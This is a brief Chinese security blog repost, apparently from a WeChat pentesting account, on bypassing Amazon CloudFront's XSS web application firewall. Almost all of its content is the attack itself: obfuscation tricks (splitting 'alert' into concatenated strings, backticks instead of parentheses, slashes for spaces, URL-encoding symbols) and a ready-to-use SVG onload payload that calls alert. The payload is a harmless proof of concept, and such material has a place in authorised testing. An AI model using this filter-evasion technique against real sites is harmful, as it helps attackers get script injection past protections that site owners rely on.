1) alert = window["al "+"ert"]
2)用``绕过()
3)用/替换空格
4)对符号进行编码:
< = %3c> = %3e" = %22[ = %5b] = %5d` = %60
未编码的payload:
<svg/onload=window["al"+"ert"]`1337`>
原文始发于微信公众号(Khan安全攻防实验室):绕过Cloudfront XSS WAF
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
- 本文由 admin 发表于 2023年5月23日09:24:33
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
绕过Cloudfront XSS WAFhttps://cn-sec.com/archives/1753087.html
评论